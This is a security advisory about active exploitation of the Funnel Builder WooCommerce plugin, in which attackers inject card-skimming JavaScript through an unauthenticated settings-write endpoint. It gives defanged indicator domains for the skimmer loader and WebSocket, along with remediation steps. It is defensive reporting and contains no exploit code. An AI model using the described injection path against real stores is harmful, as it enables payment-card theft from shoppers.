Funnel Builder WooCommerce Flaw Exploited to Steal Card Data

Attackers are actively exploiting a critical vulnerability in Funnel Builder by FunnelKit, a WordPress plugin used to customize WooCommerce checkout flows. Sansec says vulnerable stores can be abused without authentication to inject arbitrary JavaScript into checkout pages, where the code can steal payment-card numbers, CVVs, billing addresses, and other customer data.^[1]

The practical risk is direct: this is not a cosmetic WordPress admin bug. It targets the checkout path, so a compromised site can keep taking orders while quietly leaking payment details. The fixed version is Funnel Builder 3.15.0.3; Sansec and BleepingComputer both report that versions before 3.15.0.3 are affected, and the plugin has more than 40,000 active installations according to WordPress.org.^[1][2][3]

What store owners should verify now

Sansec traces the issue to a public checkout endpoint that allowed older Funnel Builder releases to call internal methods without a proper permission check or a safe method allow-list. That path let an unauthenticated request write attacker-controlled content into the plugin’s global settings. If the attacker placed a script in the External Scripts setting, it would be printed across Funnel Builder checkout pages and run during checkout transactions.^[1]

The observed payload was designed to look like familiar analytics infrastructure. Sansec found a fake Google Tag Manager or Google Analytics-style loader that pulled JavaScript from analytics-reports[.]com/wss/jquery-lib.js and opened a WebSocket connection to wss://protect-wss[.]com/ws. The returned skimmer was tailored to the victim storefront and focused on payment and billing fields.^[1]

For administrators, the first step is to update Funnel Builder from the WordPress dashboard or replace it manually with version 3.15.0.3 or later. The second step is equally important: open the FunnelKit checkout settings and review Settings > Checkout > External Scripts and any other custom script areas for unfamiliar tags. Do not assume that a script is safe because it looks like GTM, Google Analytics, or a marketing pixel. This is a common Magecart pattern: the attacker hides in the part of the page reviewers expect to be noisy.

After updating, check recent orders and checkout traffic for signs of customer-data exposure. Useful triage includes looking for the two IOCs above, recently modified FunnelKit settings, unexpected JavaScript in page source, suspicious POST requests around checkout endpoints, and scripts that load from domains unrelated to your normal analytics, ad, or payment stack. If card data may have been exposed, preserve logs and coordinate the incident response with the payment processor and legal/compliance owner before deleting evidence.

Howtofix.guide has covered the same web-skimming pattern before: fake plugin abuse in WordPress malware campaigns, skimmers hiding behind Google Analytics-like infrastructure, and Magecart operators using fake Google-themed domains. The Funnel Builder case fits that pattern closely, but the checkout-plugin context makes it especially urgent for WooCommerce stores because the malicious code lands exactly where customers type payment details.

There is no official CVE identifier for this specific bug at publication time.^[2] That should not lower priority. Active exploitation, unauthenticated settings modification, a patched release, and public IOCs are enough to justify immediate action.

References

1. Sansec Forensics Team. Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts. Published May 14, 2026.
2. BleepingComputer. Funnel Builder WordPress plugin bug exploited to steal credit cards. Published May 15, 2026.
3. WordPress.org Plugin Directory. FunnelKit – Funnel Builder for WooCommerce Checkout. Accessed May 16, 2026.
4. The Hacker News. Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming. Published May 16, 2026.